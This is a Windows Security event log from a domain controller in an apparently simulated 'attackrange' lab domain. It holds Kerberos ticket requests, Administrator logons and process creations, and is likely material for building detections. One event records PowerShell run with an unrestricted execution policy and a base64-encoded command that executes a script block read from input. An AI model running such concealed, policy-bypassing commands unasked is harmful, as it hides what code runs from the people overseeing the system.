ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258061
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258060
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x570395

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258059
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x570395

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258058
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x570395
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{94F5FBEF-489D-AAF9-3BB5-270620D7B5A2}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258057
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{94F5FBEF-489D-AAF9-3BB5-270620D7B5A2}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258056
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{94F5FBEF-489D-AAF9-3BB5-270620D7B5A2}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258055
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258054
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x56205A

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258053
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x561262

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=258052
Keywords=Audit Success
Message=An account was logged off.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55F201

Logon Type:			3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258051
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x119c
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x484
	Creator Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Process Command Line:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBCB8.tmp" "c:\Users\Administrator\AppData\Local\Temp\dpghsoxh\CSC9100C513553D4E579BC5FD23841D6C4.TMP"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:22 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258050
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x484
	New Process Name:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x294
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\dpghsoxh\dpghsoxh.cmdline"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258096
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x573406

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258095
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x573406
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258094
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258093
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258092
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258091
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x474
	New Process Name:	C:\Windows\System32\chcp.com
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa98
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\chcp.com" 65001

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258090
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xa98
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x12bc
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=258089
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x571336

Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeEnableDelegationPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258088
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x571336
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Workstation Name:	WIN-DC-725
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=258087
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.

Subject:
	Security ID:		NT AUTHORITY\NETWORK SERVICE
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E4
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Target Server:
	Target Server Name:	localhost
	Additional Information:	localhost

Process Information:
	Process ID:		0x534
	Process Name:		C:\Windows\System32\svchost.exe

Network Information:
	Network Address:	-
	Port:			-

This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=258086
Keywords=Audit Success
Message=A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@ATTACKRANGE.LOCAL
	Account Domain:		ATTACKRANGE.LOCAL
	Logon GUID:		{050B45FC-0D0E-AC38-6713-C08B99C3BD76}

Service Information:
	Service Name:		WIN-DC-725$
	Service ID:		ATTACKRANGE\WIN-DC-725$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=258085
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	ATTACKRANGE
	User ID:			ATTACKRANGE\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		ATTACKRANGE\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
03/12/2021 10:48:23 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=258084
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x57048D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x12bc
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xc14
	Creator Process Name:	C:\Windows\System32\cmd.exe
